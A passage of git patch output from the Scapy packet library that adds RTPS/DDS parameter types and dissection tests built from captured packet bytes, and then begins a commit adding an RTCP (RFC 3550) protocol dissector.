TransportInfoPacket(EPacket): + name = "Transport Info" + fields_desc = [ + LEIntField("classID", 0), + LEIntField("messageSizeMax", 0) + ] + + class EndpointFlagsPacket(Packet): name = "RTPS Endpoint Builtin Endpoint Flags" fields_desc = [ @@ -279,6 +312,7 @@ def extract_padding(self, p): b"\x01\x0E": "Technicolor Inc. - Qeo", b"\x01\x0F": "eProsima - Fast-RTPS", b"\x01\x10": "ADLINK - Cyclone DDS", + b"\x01\x11": "GurumNetworks - GurumDDS", } diff --git a/scapy/contrib/rtps/pid_types.py b/scapy/contrib/rtps/pid_types.py index 07c8579dc16..a5444678acb 100644 --- a/scapy/contrib/rtps/pid_types.py +++ b/scapy/contrib/rtps/pid_types.py @@ -27,11 +27,14 @@ from scapy.base_classes import Packet_metaclass from scapy.fields import ( + IntField, PacketField, PacketListField, ShortField, StrLenField, + XIntField, XShortField, + XStrFixedLenField, ) from scapy.packet import Packet @@ -40,8 +43,11 @@ EField, EPacket, GUIDPacket, + LeaseDurationPacket, LocatorPacket, + ProductVersionPacket, ProtocolVersionPacket, + TransportInfoPacket, VendorIdPacket, e_flags, FORMAT_LE, @@ -104,6 +110,12 @@ class ParameterIdField(XShortField): 0x0071, 0x0077, 0x4014, + 0x8000, + 0x8001, + 0x800f, + 0x8010, + 0x8016, + 0x8017 ] def randval(self): @@ -440,6 +452,19 @@ class PID_CONTENT_FILTER_PROPERTY(PIDPacketBase): class PID_PARTICIPANT_GUID(PIDPacketBase): name = "PID_PARTICIPANT_GUID" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + PacketField("guid", "", GUIDPacket), + ] class PID_ENDPOINT_GUID(PIDPacketBase): @@ -507,6 +532,126 @@ class PID_UNKNOWN(PIDPacketBase): name = "PID_UNKNOWN" +class PID_PRODUCT_VERSION(PIDPacketBase): + name = "PID_PRODUCT_VERSION" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + PacketField("productVersion", "", ProductVersionPacket), + ] + + +class PID_PLUGIN_PROMISCUITY_KIND(PIDPacketBase): + name = "PID_PLUGIN_PROMISCUITY_KIND" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + EField( + XIntField("promiscuityKind", 0x0), + endianness=FORMAT_LE, + endianness_from=None + ) + ] + + +class PID_RTI_DOMAIN_ID(PIDPacketBase): + name = "PID_RTI_DOMAIN_ID" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + EField( + IntField("domainId", 0), + endianness=FORMAT_LE, + endianness_from=None + ) + ] + + +class PID_TRANSPORT_INFO_LIST(PIDPacketBase): + name = "PID_TRANSPORT_INFO_LIST" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + XStrFixedLenField("padding", "", 4), + EField( + PacketListField( + "transportInfo", [], + TransportInfoPacket, + length_from=lambda p: p.parameterLength - 4) + ) + ] + + +class PID_REACHABILITY_LEASE_DURATION(PIDPacketBase): + name = "PID_REACHABILITY_LEASE_DURATION" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + PacketField("lease_duration", "", LeaseDurationPacket), + ] + + +class PID_VENDOR_BUILTIN_ENDPOINT_SET(PIDPacketBase): + name = "PID_VENDOR_BUILTIN_ENDPOINT_SET" + fields_desc = [ + EField( + ParameterIdField("parameterId", 0), + endianness=FORMAT_LE, + endianness_from=None, + ), + EField( + ShortField("parameterLength", 0), + endianness=FORMAT_LE, + endianness_from=None + ), + EField( + XIntField("flags", 0), + endianness=FORMAT_LE, + endianness_from=None + ) + ] + + _RTPSParameterIdTypes = { 0x0000: PID_PAD, # 0x0001: PID_SENTINEL, @@ -564,6 +709,12 @@ class PID_UNKNOWN(PIDPacketBase): 0x0071: PID_STATUS_INFO, 0x0077: PID_BUILTIN_ENDPOINT_QOS, 0x4014: PID_DOMAIN_TAG, + 0x8000: PID_PRODUCT_VERSION, + 0x8001: PID_PLUGIN_PROMISCUITY_KIND, + 0x800f: PID_RTI_DOMAIN_ID, + 0x8010: PID_TRANSPORT_INFO_LIST, + 0x8016: PID_REACHABILITY_LEASE_DURATION, + 0x8017: PID_VENDOR_BUILTIN_ENDPOINT_SET } @@ -578,13 +729,12 @@ def get_pid_class( _id = struct.unpack(endianness + "h", remain[0:2])[0] - if _id == 0x0001: # sentinel + if _id == 0x0001: return None - next_cls = _RTPSParameterIdTypes.get(_id, PID_UNKNOWN) + _id = _id & 0xffff - if next_cls is None: - return None + next_cls = _RTPSParameterIdTypes.get(_id, PID_UNKNOWN) next_cls.endianness = endianness diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 8239369edf2..229fb52df19 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -58,7 +58,11 @@ SerializedDataField, VendorIdPacket, ) -from scapy.contrib.rtps.pid_types import ParameterListPacket, get_pid_class +from scapy.contrib.rtps.pid_types import ( + ParameterListPacket, + get_pid_class, + PID_SENTINEL +) _rtps_reserved_entity_ids = { @@ -150,6 +154,7 @@ class InlineQoSPacket(EPacket): fields_desc = [ PacketListField("parameters", [], next_cls_cb=get_pid_class), + PacketField("sentinel", "", PID_SENTINEL), ] diff --git a/test/contrib/rtps/rtps.uts b/test/contrib/rtps/rtps.uts index 9376c5b4f0b..b6b173d630b 100644 --- a/test/contrib/rtps/rtps.uts +++ b/test/contrib/rtps/rtps.uts @@ -57,109 +57,351 @@ pkt2 = RTPS()/RTPSMessage(submessages=[ ]) assert(bytes(RTPS()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -= RTPS header dissect -p = RTPS(pkt) -assert(p.magic == b'\x52\x54\x50\x53') -assert(p.protocolVersion.major == 2) -assert(p.protocolVersion.minor == 1) -assert(p.vendorId.vendor_id == b'\x01\x10') -assert(p.guidPrefix.hostId == 0x57631001) -assert(p.guidPrefix.appId == 0xd6ab407f) -assert(p.guidPrefix.instanceId == 0x5bd9bb1c) -assert(len(p.submessages) == 3) - -= RTPS INFO_DST Submessage -assert(p.submessages[0].submessageId == 0x0E) -assert(p.submessages[0].submessageFlags == 0x1) -assert(p.submessages[0].octetsToNextHeader == 12) -assert(p.submessages[0].guidPrefix.hostId == 0x882a1001) -assert(p.submessages[0].guidPrefix.appId == 0x5d8c9740) -assert(p.submessages[0].guidPrefix.instanceId == 0x78b62dc2) - -= RTPS INFO_TS Submessage -assert(p.submessages[1].submessageId == 0x09) -assert(p.submessages[1].submessageFlags == 'E') -assert(p.submessages[1].octetsToNextHeader == 8) -assert(p.submessages[1].ts_seconds == 1619087604) -assert(p.submessages[1].ts_fraction == 475848017) - -= RTPS DATA Submessage -assert(p.submessages[2].submessageId == 0x15) -assert(p.submessages[2].submessageFlags == 0x05) -assert(p.submessages[2].octetsToNextHeader == 272) -assert(p.submessages[2].extraFlags == 0x00) -assert(p.submessages[2].octetsToInlineQoS == 16) -assert(p.submessages[2].readerEntityIdKey == 0x100) -assert(p.submessages[2].readerEntityIdKind == 0xc7) -assert(p.submessages[2].writerEntityIdKey == 0x100) -assert(p.submessages[2].writerEntityIdKind == 0xc2) -assert(p.submessages[2].writerSeqNumHi == 0) -assert(p.submessages[2].writerSeqNumLow == 1) -assert(isinstance(p.submessages[2].data, DataPacket)) - -assert(p.submessages[2].data.encapsulationKind == 0x3) -assert(p.submessages[2].data.encapsulationOptions == 0x0) -assert(len(p.submessages[2].data.parameterList.parameterValues) == 12) - -assert(p.submessages[2].data.parameterList.parameterValues[0].parameterId == 0x15) -assert(p.submessages[2].data.parameterList.parameterValues[0].parameterLength == 4) -assert(p.submessages[2].data.parameterList.parameterValues[0].protocolVersion.minor == 1) -assert(p.submessages[2].data.parameterList.parameterValues[0].protocolVersion.major == 2) -assert(p.submessages[2].data.parameterList.parameterValues[0].padding == b'\x00\x00') - -assert(p.submessages[2].data.parameterList.parameterValues[1].parameterId == 0x16) -assert(p.submessages[2].data.parameterList.parameterValues[1].parameterLength == 4) -assert(p.submessages[2].data.parameterList.parameterValues[1].vendorId.vendor_id == b'\x01\x10') -assert(p.submessages[2].data.parameterList.parameterValues[1].padding == b'\x00\x00') - -assert(p.submessages[2].data.parameterList.parameterValues[2].parameterId == 0x02) -assert(p.submessages[2].data.parameterList.parameterValues[2].parameterLength == 8) -assert(p.submessages[2].data.parameterList.parameterValues[2].parameterData == b'\x0a\x00\x00\x00\x00\x00\x00\x00') += RTPS packet declaration +pkt3 = RTPS( + protocolVersion=ProtocolVersionPacket(major=2, minor=1), + vendorId=VendorIdPacket(vendor_id=b"\x01\x10"), + guidPrefix=GUIDPrefixPacket( + hostId=1466109953, appId=3601547391, instanceId=1540995868 + ), + magic=b"RTPS", +) / RTPSMessage( + submessages=[ + RTPSSubMessage_INFO_DST( + submessageId=14, + submessageFlags=1, + octetsToNextHeader=12, + guidPrefix=GUIDPrefixPacket( + hostId=2284457985, appId=1569494848, instanceId=2025205186 + ), + ), + RTPSSubMessage_INFO_TS( + submessageId=9, + submessageFlags=1, + octetsToNextHeader=8, + ts_seconds=1619087604, + ts_fraction=475848017, + ), + RTPSSubMessage_DATA( + submessageId=21, + submessageFlags=5, + octetsToNextHeader=272, + extraFlags=0, + octetsToInlineQoS=16, + readerEntityIdKey=256, + readerEntityIdKind=199, + writerEntityIdKey=256, + writerEntityIdKind=194, + writerSeqNumHi=0, + writerSeqNumLow=1, + data=DataPacket( + encapsulationKind=3, + encapsulationOptions=0, + parameterList=ParameterListPacket( + parameterValues=[ + PID_PROTOCOL_VERSION( + parameterId=21, + parameterLength=4, + protocolVersion=ProtocolVersionPacket(major=2, minor=1), + padding=b"\x00\x00", + ), + PID_VENDOR_ID( + parameterId=22, + parameterLength=4, + vendorId=VendorIdPacket(vendor_id=b"\x01\x10"), + padding=b"\x00\x00", + ), + PID_PARTICIPANT_LEASE_DURATION( + parameterId=2, + parameterLength=8, + parameterData=b"\n\x00\x00\x00\x00\x00\x00\x00", + ), + PID_PARTICIPANT_GUID( + parameterId=80, + parameterLength=16, + guid=GUIDPacket( + hostId=1466109953, + appId=3601547391, + instanceId=1540995868, + entityId=449, + ), + ), + PID_BUILTIN_ENDPOINT_SET( + parameterId=88, + parameterLength=4, + parameterData=b"?\x0c\x00\x00", + ), + PID_DOMAIN_ID( + parameterId=15, + parameterLength=4, + parameterData=b"\x00\x00\x00\x00", + ), + PID_DEFAULT_UNICAST_LOCATOR( + parameterId=49, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=60349, address="172.17.0.2" + ), + ), + PID_DEFAULT_MULTICAST_LOCATOR( + parameterId=72, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=7401, address="239.255.0.1" + ), + ), + PID_METATRAFFIC_UNICAST_LOCATOR( + parameterId=50, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=60349, address="172.17.0.2" + ), + ), + PID_METATRAFFIC_MULTICAST_LOCATOR( + parameterId=51, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=7400, address="239.255.0.1" + ), + ), + PID_UNKNOWN( + parameterId=32775, + parameterLength=56, + parameterData=b"\x00\x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00test.local/0.8.0/Linux/Linux\x00\x00\x00\x00", + ), + PID_UNKNOWN( + parameterId=32793, + parameterLength=4, + parameterData=b"\x00\x80\x06\x00", + ), + ], + sentinel=PID_SENTINEL(parameterId=1, parameterLength=0), + ), + ), + ), + ] +) -assert(p.submessages[2].data.parameterList.parameterValues[3].parameterId == 0x50) -assert(p.submessages[2].data.parameterList.parameterValues[3].parameterLength == 16) -assert(p.submessages[2].data.parameterList.parameterValues[3].parameterData == b'Wc\x10\x01\xd6\xab@\x7f[\xd9\xbb\x1c\x00\x00\x01\xc1') - -assert(p.submessages[2].data.parameterList.parameterValues[4].parameterId == 0x58) -assert(p.submessages[2].data.parameterList.parameterValues[4].parameterLength == 4) -assert(p.submessages[2].data.parameterList.parameterValues[4].parameterData == b'\x3f\x0c\x00\x00') - -assert(p.submessages[2].data.parameterList.parameterValues[5].parameterId == 0x0f) -assert(p.submessages[2].data.parameterList.parameterValues[5].parameterLength == 4) -assert(p.submessages[2].data.parameterList.parameterValues[5].parameterData == b'\x00\x00\x00\x00') - -assert(p.submessages[2].data.parameterList.parameterValues[6].parameterId == 0x31) -assert(p.submessages[2].data.parameterList.parameterValues[6].parameterLength == 24) -assert(p.submessages[2].data.parameterList.parameterValues[6].locator.locatorKind == 0x1000000) -assert(p.submessages[2].data.parameterList.parameterValues[6].locator.port == 60349) -assert(p.submessages[2].data.parameterList.parameterValues[6].locator.address == '172.17.0.2') - -assert(p.submessages[2].data.parameterList.parameterValues[7].parameterId == 0x48) -assert(p.submessages[2].data.parameterList.parameterValues[7].parameterLength == 24) -assert(p.submessages[2].data.parameterList.parameterValues[7].locator.locatorKind == 0x1000000) -assert(p.submessages[2].data.parameterList.parameterValues[7].locator.port == 7401) -assert(p.submessages[2].data.parameterList.parameterValues[7].locator.address == '239.255.0.1') - -assert(p.submessages[2].data.parameterList.parameterValues[8].parameterId == 0x32) -assert(p.submessages[2].data.parameterList.parameterValues[8].parameterLength == 24) -assert(p.submessages[2].data.parameterList.parameterValues[8].locator.locatorKind == 0x1000000) -assert(p.submessages[2].data.parameterList.parameterValues[8].locator.port == 60349) -assert(p.submessages[2].data.parameterList.parameterValues[8].locator.address == '172.17.0.2') - -assert(p.submessages[2].data.parameterList.parameterValues[9].parameterId == 0x33) -assert(p.submessages[2].data.parameterList.parameterValues[9].parameterLength == 24) -assert(p.submessages[2].data.parameterList.parameterValues[9].locator.locatorKind == 0x1000000) -assert(p.submessages[2].data.parameterList.parameterValues[9].locator.port == 7400) -assert(p.submessages[2].data.parameterList.parameterValues[9].locator.address == '239.255.0.1') - -assert(p.submessages[2].data.parameterList.parameterValues[10].parameterId == 0x8007) -assert(p.submessages[2].data.parameterList.parameterValues[10].parameterLength == 56) -assert(p.submessages[2].data.parameterList.parameterValues[10].parameterData == b'\x00\x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00test.local/0.8.0/Linux/Linux\x00\x00\x00\x00') += RTPS header dissect +assert pkt3.build() == pkt -assert(p.submessages[2].data.parameterList.parameterValues[11].parameterId == 0x8019) -assert(p.submessages[2].data.parameterList.parameterValues[11].parameterLength == 4) -assert(p.submessages[2].data.parameterList.parameterValues[11].parameterData == b'\x00\x80\x06\x00') ++ Test RTI RTPS += Test dissection +d = b"\x52\x54\x50\x53\x02\x03\x01\x01\x01\x01\x30\xba\xa8\x7b\x1d\xce" \ + b"\xb3\x29\x1e\x43\x09\x01\x08\x00\xd6\x64\xa8\x61\x16\x09\x34\x7c" \ + b"\x15\x05\xdc\x02\x00\x00\x10\x00\x00\x00\x00\x00\x00\x01\x00\xc2" \ + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x03\x00\x00\x50\x00\x10\x00" \ + b"\x01\x01\x30\xba\xa8\x7b\x1d\xce\xb3\x29\x1e\x43\x00\x00\x01\xc1" \ + b"\x58\x00\x04\x00\x3f\x0c\x00\x00\x77\x00\x04\x00\x01\x00\x00\x00" \ + b"\x15\x00\x04\x00\x02\x03\x00\x00\x16\x00\x04\x00\x01\x01\x00\x00" \ + b"\x00\x80\x04\x00\x06\x00\x01\x00\x59\x00\x78\x01\x06\x00\x00\x00" \ + b"\x16\x00\x00\x00\x64\x64\x73\x2e\x73\x79\x73\x5f\x69\x6e\x66\x6f" \ + b"\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65\x00\x00\x00\x0d\x00\x00\x00" \ + b"\x64\x66\x30\x62\x36\x64\x38\x33\x61\x62\x34\x36\x00\x00\x00\x00" \ + b"\x18\x00\x00\x00\x64\x64\x73\x2e\x73\x79\x73\x5f\x69\x6e\x66\x6f" \ + b"\x2e\x70\x72\x6f\x63\x65\x73\x73\x5f\x69\x64\x00\x05\x00\x00\x00" \ + b"\x34\x38\x33\x30\x00\x00\x00\x00\x21\x00\x00\x00\x64\x64\x73\x2e" \ + b"\x73\x79\x73\x5f\x69\x6e\x66\x6f\x2e\x65\x78\x65\x63\x75\x74\x61" \ + b"\x62\x6c\x65\x5f\x66\x69\x6c\x65\x70\x61\x74\x68\x00\x00\x00\x00" \ + b"\x42\x00\x00\x00\x2f\x75\x73\x72\x2f\x6c\x6f\x63\x61\x6c\x2f\x73" \ + b"\x72\x63\x2f\x72\x74\x69\x2f\x72\x65\x73\x6f\x75\x72\x63\x65\x2f" \ + b"\x61\x70\x70\x2f\x62\x69\x6e\x2f\x78\x36\x34\x4c\x69\x6e\x75\x78" \ + b"\x32\x2e\x36\x67\x63\x63\x34\x2e\x34\x2e\x35\x2f\x72\x74\x69\x64" \ + b"\x64\x73\x73\x70\x79\x00\x00\x00\x14\x00\x00\x00\x64\x64\x73\x2e" \ + b"\x73\x79\x73\x5f\x69\x6e\x66\x6f\x2e\x74\x61\x72\x67\x65\x74\x00" \ + b"\x14\x00\x00\x00\x78\x36\x34\x4c\x69\x6e\x75\x78\x32\x2e\x36\x67" \ + b"\x63\x63\x34\x2e\x34\x2e\x35\x00\x20\x00\x00\x00\x64\x64\x73\x2e" \ + b"\x73\x79\x73\x5f\x69\x6e\x66\x6f\x2e\x63\x72\x65\x61\x74\x69\x6f" \ + b"\x6e\x5f\x74\x69\x6d\x65\x73\x74\x61\x6d\x70\x00\x14\x00\x00\x00" \ + b"\x32\x30\x32\x31\x2d\x30\x36\x2d\x37\x20\x30\x34\x3a\x30\x39\x3a" \ + b"\x30\x32\x5a\x00\x21\x00\x00\x00\x64\x64\x73\x2e\x73\x79\x73\x5f" \ + b"\x69\x6e\x66\x6f\x2e\x65\x78\x65\x63\x75\x74\x69\x6f\x6e\x5f\x74" \ + b"\x69\x6d\x65\x73\x74\x61\x6d\x70\x00\x00\x00\x00\x14\x00\x00\x00" \ + b"\x32\x30\x32\x31\x2d\x31\x32\x2d\x31\x20\x30\x39\x3a\x31\x35\x3a" \ + b"\x32\x39\x5a\x00\x31\x00\x18\x00\x01\x00\x00\x00\xf3\x1c\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\x31\x00\x18\x00\x00\x00\x00\x01\xf3\x1c\x00\x00\x61\xab\xd9\x79" \ + b"\xb5\x7c\x13\xa5\x29\x49\x2c\xa3\x00\x00\x00\x00\x32\x00\x18\x00" \ + b"\x01\x00\x00\x00\xf2\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\x32\x00\x18\x00\x00\x00\x00\x01" \ + b"\xf2\x1c\x00\x00\x61\xab\xd9\x79\xb5\x7c\x13\xa5\x29\x49\x2c\xa3" \ + b"\x00\x00\x00\x00\x33\x00\x18\x00\x01\x00\x00\x00\xe8\x1c\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xff\x00\x01" \ + b"\x02\x00\x08\x00\x06\x00\x00\x00\xff\xff\xff\x7f\x01\x80\x04\x00" \ + b"\xff\xff\x00\x00\x62\x00\x28\x00\x22\x00\x00\x00\x52\x54\x49\x20" \ + b"\x44\x61\x74\x61\x20\x44\x69\x73\x74\x72\x69\x62\x75\x74\x69\x6f" \ + b"\x6e\x20\x53\x65\x72\x76\x69\x63\x65\x20\x53\x70\x79\x00\x00\x00" \ + b"\x0f\x00\x04\x00\x00\x00\x00\x00\x0f\x80\x04\x00\x00\x00\x00\x00" \ + b"\x10\x80\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\xe3\xff\x00\x00" \ + b"\x00\x00\x00\x01\x00\x00\x01\x00\x16\x80\x08\x00\x10\x00\x00\x00" \ + b"\x00\x00\x00\x00\x17\x80\x04\x00\x03\x00\x00\x00\x01\x00\x00\x00" -assert(p.submessages[2].data.parameterList.sentinel.parameterId == 0x1) -assert(p.submessages[2].data.parameterList.sentinel.parameterLength == 0) -assert(p.submessages[2].data.parameterList.sentinel.parameterData == b'') +p0 = RTPS(d) +p1 = RTPS( + protocolVersion=ProtocolVersionPacket(major=2, minor=3), + vendorId=VendorIdPacket(vendor_id=b"\x01\x01"), + guidPrefix=GUIDPrefixPacket( + hostId=16855226, appId=2826640846, instanceId=3005816387 + ), + magic=b"RTPS", +) / RTPSMessage( + submessages=[ + RTPSSubMessage_INFO_TS( + submessageId=9, + submessageFlags=1, + octetsToNextHeader=8, + ts_seconds=1638425814, + ts_fraction=2083784982, + ), + RTPSSubMessage_DATA( + submessageId=21, + submessageFlags=5, + octetsToNextHeader=732, + extraFlags=0, + octetsToInlineQoS=16, + readerEntityIdKey=0, + readerEntityIdKind=0, + writerEntityIdKey=256, + writerEntityIdKind=194, + writerSeqNumHi=0, + writerSeqNumLow=1, + data=DataPacket( + encapsulationKind=3, + encapsulationOptions=0, + parameterList=ParameterListPacket( + parameterValues=[ + PID_PARTICIPANT_GUID( + parameterId=80, + parameterLength=16, + guid=GUIDPacket( + hostId=16855226, + appId=2826640846, + instanceId=3005816387, + entityId=449, + ), + ), + PID_BUILTIN_ENDPOINT_SET( + parameterId=88, + parameterLength=4, + parameterData=b"?\x0c\x00\x00", + ), + PID_BUILTIN_ENDPOINT_QOS( + parameterId=119, + parameterLength=4, + parameterData=b"\x01\x00\x00\x00", + ), + PID_PROTOCOL_VERSION( + parameterId=21, + parameterLength=4, + protocolVersion=ProtocolVersionPacket(major=2, minor=3), + padding=b"\x00\x00", + ), + PID_VENDOR_ID( + parameterId=22, + parameterLength=4, + vendorId=VendorIdPacket(vendor_id=b"\x01\x01"), + padding=b"\x00\x00", + ), + PID_PRODUCT_VERSION( + parameterId=32768, + parameterLength=4, + productVersion=ProductVersionPacket( + major=6, minor=0, release=1, revision=0 + ), + ), + PID_PROPERTY_LIST( + parameterId=89, + parameterLength=376, + parameterData=b"\x06\x00\x00\x00\x16\x00\x00\x00dds.sys_info.hostname\x00\x00\x00\r\x00\x00\x00df0b6d83ab46\x00\x00\x00\x00\x18\x00\x00\x00dds.sys_info.process_id\x00\x05\x00\x00\x004830\x00\x00\x00\x00!\x00\x00\x00dds.sys_info.executable_filepath\x00\x00\x00\x00B\x00\x00\x00/usr/local/src/rti/resource/app/bin/x64Linux2.6gcc4.4.5/rtiddsspy\x00\x00\x00\x14\x00\x00\x00dds.sys_info.target\x00\x14\x00\x00\x00x64Linux2.6gcc4.4.5\x00 \x00\x00\x00dds.sys_info.creation_timestamp\x00\x14\x00\x00\x002021-06-7 04:09:02Z\x00!\x00\x00\x00dds.sys_info.execution_timestamp\x00\x00\x00\x00\x14\x00\x00\x002021-12-1 09:15:29Z\x00", + ), + PID_DEFAULT_UNICAST_LOCATOR( + parameterId=49, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=7411, address="0.0.0.0" + ), + ), + PID_DEFAULT_UNICAST_LOCATOR( + parameterId=49, + parameterLength=24, + locator=LocatorPacket( + locatorKind=16777216, + port=7411, + hostId=b"a\xab\xd9y\xb5|\x13\xa5)I,\xa3\x00\x00\x00\x00", + ), + ), + PID_METATRAFFIC_UNICAST_LOCATOR( + parameterId=50, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=7410, address="0.0.0.0" + ), + ), + PID_METATRAFFIC_UNICAST_LOCATOR( + parameterId=50, + parameterLength=24, + locator=LocatorPacket( + locatorKind=16777216, + port=7410, + hostId=b"a\xab\xd9y\xb5|\x13\xa5)I,\xa3\x00\x00\x00\x00", + ), + ), + PID_METATRAFFIC_MULTICAST_LOCATOR( + parameterId=51, + parameterLength=24, + locator=LocatorPacket( + locatorKind=1, port=7400, address="239.255.0.1" + ), + ), + PID_PARTICIPANT_LEASE_DURATION( + parameterId=2, + parameterLength=8, + parameterData=b"\x06\x00\x00\x00\xff\xff\xff\x7f", + ), + PID_PLUGIN_PROMISCUITY_KIND( + parameterId=32769, parameterLength=4, promiscuityKind=65535 + ), + PID_ENTITY_NAME( + parameterId=98, + parameterLength=40, + parameterData=b'"\x00\x00\x00RTI Data Distribution Service Spy\x00\x00\x00', + ), + PID_DOMAIN_ID( + parameterId=15, + parameterLength=4, + parameterData=b"\x00\x00\x00\x00", + ), + PID_RTI_DOMAIN_ID( + parameterId=32783, parameterLength=4, domainId=0 + ), + PID_TRANSPORT_INFO_LIST( + transportInfo=[ + TransportInfoPacket(classID=1, messageSizeMax=65507), + TransportInfoPacket( + classID=16777216, messageSizeMax=65536 + ), + ], + parameterId=32784, + parameterLength=20, + padding=b"\x02\x00\x00\x00", + ), + PID_REACHABILITY_LEASE_DURATION( + parameterId=32790, + parameterLength=8, + lease_duration=LeaseDurationPacket( + seconds=268435456, fraction=0 + ), + ), + PID_VENDOR_BUILTIN_ENDPOINT_SET( + parameterId=32791, parameterLength=4, flags=3 + ), + ], + sentinel=PID_SENTINEL(parameterId=1, parameterLength=0), + ), + ), + ), + ] +) +assert p0.build() == d +assert p1.build() == d +assert p1 == p0 \ No newline at end of file From 99fb59b3f183078aafaafe4f161a8fa79dae6f05 Mon Sep 17 00:00:00 2001 From: Pavel Oborin Date: Tue, 1 Feb 2022 12:12:29 +0300 Subject: [PATCH 0728/1632] RTCP Support (#3461) * RTCP Support * Moved rtcp.py to scapy/contrib && Added dummy test * Added real RTCP Sender report parsing to tests * Added SDES parsing * Flake8 fixes Co-authored-by: gpotter2 --- scapy/contrib/rtcp.py | 137 ++++++++++++++++++++++++++++++++++++++++++ test/contrib/rtcp.uts | 78 ++++++++++++++++++++++++ 2 files changed, 215 insertions(+) create mode 100644 scapy/contrib/rtcp.py create mode 100644 test/contrib/rtcp.uts diff --git a/scapy/contrib/rtcp.py b/scapy/contrib/rtcp.py new file mode 100644 index 00000000000..431427bd312 --- /dev/null +++ b/scapy/contrib/rtcp.py @@ -0,0 +1,137 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Pavel Oborin +# This program is published under a GPLv2 license + +# RFC 3550 +# scapy.contrib.description = Real-Time Transport Control Protocol +# scapy.contrib.status = loads + +""" +RTCP (rfc 3550) + +Use bind_layers(UDP, RTCP, dport=...) to start using it +""" + +import struct + +from scapy.packet import Packet +from scapy.fields import ( + BitField, + BitFieldLenField, + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + IntField, + LenField, + LongField, + PacketField, + PacketListField, + StrLenField, + X3BytesField, +) + + +_rtcp_packet_types = { + 200: 'Sender report', + 201: 'Receiver report', + 202: 'Source description', + 203: 'BYE', + 204: 'APP' +} + + +class SenderInfo(Packet): + name = "Sender info" + fields_desc = [ + LongField('ntp_timestamp', None), + IntField('rtp_timestamp', None), + IntField('sender_packet_count', None), + IntField('sender_octet_count', None) + ] + + +class ReceptionReport(Packet): + name = "Reception report" + fields_desc = [ + IntField('sourcesync', None), + ByteField('fraction_lost', None), + X3BytesField('cumulative_lost', None), + IntField('highest_seqnum_recv', None), + IntField('interarrival_jitter', None), + IntField('last_SR_timestamp', None), + IntField('delay_since_last_SR', None) + ] + + +_sdes_chunk_types = { + 0: "END", + 1: "CNAME", + 2: "NAME", + 3: "EMAIL", + 4: "PHONE", + 5: "LOC", + 6: "TOOL", + 7: "NOTE", + 8: "PRIV" +} + + +class SDESItem(Packet): + name = "SDES item" + fields_desc = [ + ByteEnumField('chunk_type', None, _sdes_chunk_types), + FieldLenField('length', None, fmt='!b', length_of='value'), + StrLenField('value', None, length_from=lambda pkt: pkt.length) + ] + + def extract_padding(self, p): + return "", p + + +class SDESChunk(Packet): + name = "SDES chunk" + fields_desc = [ + IntField('sourcesync', None), + PacketListField('items', None, pkt_cls=SDESItem) + ] + + +class RTCP(Packet): + name = "RTCP" + + fields_desc = [ + # HEADER + BitField('version', 2, 2), + BitField('padding', 0, 1), + BitFieldLenField('count', 0, 5, count_of='report_blocks'), + ByteEnumField('packet_type', 0, _rtcp_packet_types), + LenField('length', None, fmt='!h'), + # SR/RR + ConditionalField( + IntField('sourcesync', 0), + lambda pkt: pkt.packet_type in (200, 201) + ), + ConditionalField( + PacketField('sender_info', SenderInfo(), SenderInfo), + lambda pkt: pkt.packet_type == 200 + ), + ConditionalField( + PacketListField('report_blocks', None, pkt_cls=ReceptionReport, + count_from=lambda pkt: pkt.count), + lambda pkt: pkt.packet_type in (200, 201) + ), + # SDES + ConditionalField( + PacketListField('sdes_chunks', None, pkt_cls=SDESChunk, + count_from=lambda pkt: pkt.count), + lambda pkt: pkt.packet_type == 202 + ), + ] + + def post_build(self, pkt, pay): + pkt += pay + if self.length is None: + pkt = pkt[:2] + struct.pack("!h", len(pkt) // 4 - 1) + pkt[4:] + return pkt diff --git a/test/contrib/rtcp.uts b/test/contrib/rtcp.uts new file mode 100644 index 00000000000..13afe20eb59 --- /dev/null +++ 